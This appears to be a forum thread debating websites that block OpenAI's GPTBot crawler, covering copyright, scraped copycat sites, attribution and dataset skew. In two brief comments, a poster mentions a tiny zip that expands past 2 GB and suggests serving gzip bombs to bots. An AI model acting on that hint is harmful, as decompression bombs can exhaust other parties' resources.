It's worth noting that in this case "blocking" means "asking nicely for it not to index them" - so how effective this is depends on how well behaved the bots are.
There is a danger though if certain types of sites are more likely to block GPTBot than others, because that would end up skewing the data set that it trains off, which could have longer term impacts on all the content generated with it. If all the good quality sites block it and the sites full of AI generated junk don't, then that sounds like a downward spiral.
You can also just do that for no particularly good reason. Language models aren't going to go anywhere particularly worthwhile if this is their primary mode of data gathering.
I needed to test whether an app could decompress inputs over 2GB properly. I was able to create a zip file that was about 45k to do it. I think the record is something like 5k, but 50k fits just fine in a repository.
Set up direct Gzip sendfile, and that’ll keep them busy for a while.
If I’m paying for servers by the hour and half of them are run just to keep the bots happy, I’m going to have opinions about who is allowed to visit my pages and for what reason. Mooches don’t have a moral leg to stand on.
Even without all those, suppose Washington Post publishes a big exclusive story, there are going to be many websites that paraphrase the article and likely link to it, many of which don't block GPT bot. Even without the exact words, with multiple sources GPT should be able to easily figure out the original story. I don't see blocking helpful in such cases.
Yes, this (and that I don't trust the bots) is why I've removed my websites from being publicly accessible. It's the only way I can think of to be sure I'm not contributing to these models in any meaningful way.
Most new content is scraped and reposted on dozens of copycat sites within minutes of being posted. Pinterest.com may have blocked gptbot, but MySketchyPinterestClone.net hasn't, and has all the same content.
Regardless of where you stand on the LLM vs Copyright debate, that 3rd party would clearly be violating copyright by selling unlicensed content, though?
If a third party poses themselves as a network operator (basically, acts as a proxy/dumb pipe) or a library (if they have a cache) they aren't liable, are they? I think they aren't because proxy and VPN providers, or CloudFlare's 1.1.1.1, or The Internet Archive are AFAIK not generally considered liable in any sort of infringement.
Oh, I wasn't aware. Thank you for pointing out. From what I've read, even though there's an injunction, IA was going to appeal, so I hope this isn't exactly over yet?
I don't own any revenue generating websites, but I do feel like the content I create is useful. I'd rather have GPT slurp it up with the hope of some small piece of me being emitted now or in the future for others to benefit from.
I'm sure my perspective would be different if I was paying my employees to create unique content for our brand, though.
I'm not sure though. At the end of the day, I think I'd rather information to be free. But that's not a sustainable model in many industries.
AI should not behave as if it has inherent knowledge, there should be aknowledgement similar to, 'i saw on the web the other day'; or 'i was cURLing on coolrecipies.com and it gave me a new idea for halloween cake'
Humans skip attribution in their conversations all the time when it's not the subject. Why machine should be held to some different standards, especially if we want them to sound and behave naturally?
"I saw on the web the other day" is not attribution, it's basically an interjection that makes the conversation smoother. Most of time it means absolutely nothing, except for maybe "it's not my direct experience" at best (and AFAIK LLMs today don't really have any agency, so this disclaimer is moot/noise).
Sure, "I've read an article on Acme Daily" happens, but personally I typically do this as a cue for the listener to cut me off with "ah, yes, I've read this too", saving us both time. Other use case is to give signal about authenticity of the information: not a credit, again - just an indirect indicator of trustworthiness or reliability (when I hear "The Onion reports" - it's surely not about the website, it's about the following being satire). YMMV, of course. I sure want an LLM to write this, but only when it matters to me personally (not the website authors, they aren't a party in our conversation). Just like a human would.
Similarly, I don't think anyone ever said "I've found this on coolrecipes.com" unironically if the conversation is about the recipe instead of a source. Obviously, attributing it to someone both parties know - like a relative, neighbor or a celebrity is a different story - roughly the same as with the news example above. But if you hear "found on coolrecipes.com" it it's most likely an ad. And what I want to say is here is that LLMs today are a breath of fresh air - compared to modern enshittified search engines - specifically because they're not ad- and SEO-ruined (yet). Let us please keep it this way for as long as possible.
> Humans skip attribution in their conversations all the time
ChatGPT is not a human. If a news site was to publish some information on their website without attribution, this would be a problem. ChatGPT is more analogous to a news site then some person you have a conversation with.
I think then you are back to search engines but presenting results slightly differently. The way I understand LLM works I think attribution is almost impossible.
conversational ai seems to be the big ask. if you verbally prompt the particular path to it you could start by stating that 'ive read a lot of highschoolbooks', and 'my teachers always said, that' 2+2= 4.
the idea is to enable the promptor to review the information, and see for themselves, should they have need.
And yet you didn't cite any of the reference material you used to post that reply, or any of the reference material that led to you having that opinion in the first place.
I'm not being flippant here. We all use massive amounts of reference material to even think the most basic thoughts. Expecting you—or an algorithm—to be able to quote or even know the reference material that let to anything you say is a pretty high bar.
Worse - quite frequently reference material is a mashup of different ideas and stories that we've obtained from multiple sources over time.
Just like in literature - tropes are standalone entities, and they evolve over time. While a trope can be attributed to some book or author, it evolves, gets mixed up, gets deconstructed and may end up with something barely recognizable. Should LLM be forced to always give a nod to Azimov or Čapek when talking about, let's say, Bender from Futurama - if this is not explicitly relevant to the conversation? I highly doubt so - it would make conversations intolerably stuffy. Talking about virtually any topic would end with a footnotes list multiple pages long.
Our (human) "normal" common sense to attribution is to ditch any and all, unless it's relevant for some reason. Because we generally try to stay focused. People or conversation machines attributing recipes to website addresses is a Black Mirror episode material, a corporate wet dream.
If the AI were a public utility, that would be great. Currently, we have to ask OpenAI/Microsoft for permission every time we want to access the knowledge source.
True, but there are free and publicly available models and while they're considered to be worse than OpenAI offerings, they aren't that bad. Or at least I hope so.
I would love to sit down with any number of 10 random website owners / managers from this list and ask them the following questions:
- Why did you block GPTBot?
- Are you aware that your content is scraped, directly copied and otherwise repurposed by other website that don't block GPTBot?
- What are your plans if in future iterations of the GPT model you're going to see that the GPT model has information that you wrote or produced? Are you going to fight it, and if so - how are you going to do that?
I think these are legitimate questions and they are the ones that I would love to hear answers to because I would love nothing more than OpenAI being hamstrung based on the bullshit that they pulled last year with ChatGPT.
Never forget that OpenAI stole the web and has had $11.3B in funding[0] and is seeking another round to place it at a $80-90 billion valuation[1].
I block AI scrapers because I don't think that these systems are good for society and I don't want to help make them better.
> Are you aware that your content is scraped, directly copied and otherwise repurposed by other website that don't block GPTBot?
Yes, which is why I've removed my sites from being publicly accessible.
> What are your plans if in future iterations of the GPT model
None. There's nothing I can do about it after it's been ingested, so the only realistic thing to do is to let it go and do my best to prevent it from happening with new stuff.
There is a big difference between copying and stealing. People who copy don’t get sued, people who steal do.
Although I am not exactly sure about the difference anyway.
Also, if you are going to make an argument, then please do it. I don’t exactly appreciate shallow comments when I have plenty of evidence to show as a rebuttal.
A human reads something for free or "free" (if they're a product for advertisers or data collectors). And no one bats an eye if they retell it to others. There are careers of this - teachers, instructors, advisors.
But if it's a a machine (or a superhuman - I want to hope hope we'll see AGI someday) that can do this at scale, the whole world is suddenly upside-down. I honestly have no idea how things should be (I have opinions, but I cannot really validate them, so they're just... opinions), but I find it interesting.
Being a pessimist and strong believer than humanity as a whole leans towards shittiest-but-cheapest solutions (down to a certain threshold, of course, but the plank is rarely high) my guess is that those websites will eventually try to monetize LLMs the way they do this with humans - by injecting ads in the information provided. Fear the day new breed of SEOs will start spamming, inventing fancier and fancier techniques of - ahem - enriching the models with customer-oriented targeted promotional materials (or whatever). And so the history will repeat itself.
I really don't understand why sites would do this. To each their own, but it currently lowers my opinion of the site. I was disappointed to see NPR and Ars on the list.
That's a good question... I suppose it seems to me like they're trying to keep useful information locked down. Even though this bot isn't 'public', it's still feels a bit like they're an author saying they don't want their book in a library. Actually it's even worse than that because they want to pick and choose who is allowed to read their words.
I guess another way I see it is like the site has put a banner at the top saying I can read their content, but can't use anything I learn from it, and can't tell you or anyone else about anything I've read. I get that in this case the 'me' is an algorithm and not a person, but does that really matter? If I read a lot of info on welding and then offer a 'learn to weld' class, how much does that differ from what the openai algorithm is doing. (And if it is public, are these same sites going to welcome the bots? I doubt it)
It also seems rather reactive and not well thought out. To include a quote from an Ars article (which gptbot can't read):
> As a thought experiment, imagine an online business declaring that it didn't want its website indexed by Google in the year 2002—a self-defeating move when that was the most popular on-ramp for finding information online.[1]
Or a couple quote Stephen King on another site that gptbot can't read[2]:
> I have said in one of my few forays into nonfiction (On Writing) that you can’t learn to write unless you’re a reader, and unless you read a lot.
> Would I forbid the teaching (if that is the word) of my stories to computers? Not even if I could. I might as well be King Canute, forbidding the tide to come in. Or a Luddite trying to stop industrial progress by hammering a steam loom to pieces.
As I said, to each their own. I just would have expected a site like NPR, that lists it's mission as "to create a more informed public", to not take actions that work directly against that goal.
Very interesting. It would never have occurred to me that anyone would equate "I don't want this to train AI" with "I don't want people to learn this".
OpenAI tries to set a precedence for default approval for crawling and training AIs with copyrighted content. Compared to search crawling it doesn't proove to offer anything in return
There is a danger though if certain types of sites are more likely to block GPTBot than others, because that would end up skewing the data set that it trains off, which could have longer term impacts on all the content generated with it. If all the good quality sites block it and the sites full of AI generated junk don't, then that sounds like a downward spiral.